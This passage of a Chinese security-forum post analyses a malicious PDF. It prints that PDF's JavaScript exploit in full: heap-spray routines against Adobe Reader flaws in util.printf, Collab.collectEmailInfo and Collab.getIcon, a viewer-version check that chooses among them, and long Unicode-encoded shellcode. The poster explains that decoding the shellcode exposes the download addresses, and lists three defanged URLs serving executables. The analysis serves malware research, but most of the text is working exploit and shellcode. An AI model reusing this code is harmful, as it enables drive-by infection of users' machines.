  14.   var heapblock = nop + payload;
  15.   var bigblock = unescape("%u0A0A%u0A0A");
  16.   var headersize = 20;
  17.   var spray = headersize + heapblock.length;
  18.   while (bigblock.length < spray){
  19.    bigblock += bigblock;
  20.   }
  21.   var fillblock = bigblock.substring(0, spray);
  22.   var block = bigblock.substring(0, bigblock.length-spray);
  23.   while (block.length+spray < 0x40000){
  24.    block = block + block + fillblock;
  25.   }
  26.   var mem_array = new Array();
  27.   for (var i = 0; i < 1400; i++){
  28.    mem_array[i] = block + heapblock;
  29.   }
  30.   var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  31.   util.printf("%45000f", num);
  32. }

  34. function collab_email(){
  35.   var shellcode = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u612F%u6763%u766E%u3277%u652E%u6578%u0000");
  36.   var mem_array = new Array();
  37.   var cc = 0x0c0c0c0c;
  38.   var addr = 0x400000;
  39.   var sc_len = shellcode.length * 2;
  40.   var len = addr - (sc_len+0x38);
  41.   var yarsp = unescape("%u9090%u9090");
  42.   yarsp = fix_it(yarsp, len);
  43.   var count2 = (cc - 0x400000)/addr;
  44.   for (var count = 0; count < count2; count++){
  45.    mem_array[count] = yarsp + shellcode;
  46.   }
  47.   var overflow = unescape("%u0c0c%u0c0c");
  48.   while (overflow.length < 44952){
  49.    overflow += overflow;
  50.   }
  51.   this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
  52. }

  54. function collab_geticon(){
  55.   if (app.doc.Collab.getIcon){
  56.    var arry = new Array();
  57.    var vvpethya = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u642F%u6968%u7670%u3279%u652E%u6578%u0000");
  58.    var hWq500CN = vvpethya.length * 2;
  59.    var len = 0x400000 - (hWq500CN + 0x38);
  60.    var yarsp = unescape("%u9090%u9090");
  61.    yarsp = fix_it(yarsp, len);
  62.    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  63.    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  64.     arry[vqcQD96y] = yarsp + vvpethya;
  65.    }
  66.    var tUMhNbGw = unescape("%09");
  67.    while (tUMhNbGw.length < 0x4000){
  68.     tUMhNbGw += tUMhNbGw;
  69.    }
  70.    tUMhNbGw = "N." + tUMhNbGw;
  71.    app.doc.Collab.getIcon(tUMhNbGw);
  72.   }
  73. }

  75. function pdf_start(){

  77.   var version = app.viewerVersion.toString();
  78.   version = version.replace(/\D/g,'');
  79.   var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  80.   if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){
  81.    util_printf();
  82.   }
  83.   if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){
  84.    collab_email();
  85.   }
  86.   if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
  87.    collab_geticon();
  88.   }
  89. }

  91. pdf_start();


复制代码


这代码里面就是shellcode加密了。把这段代码放回redoce中,用“解密——5>Unicode清除(%u,\u)(参数/无参数)”清除即可得到挂马地址

得到的地址如下:
hxxp://mirroronerofive.com/sleep/afkpu2.exe
hxxp://mirroronerofive.com/sleep/dhipvy2.exe
hxxp://mirroronerofive.com/sleep/acgnvw2.exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 00:57 , Processed in 0.119173 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表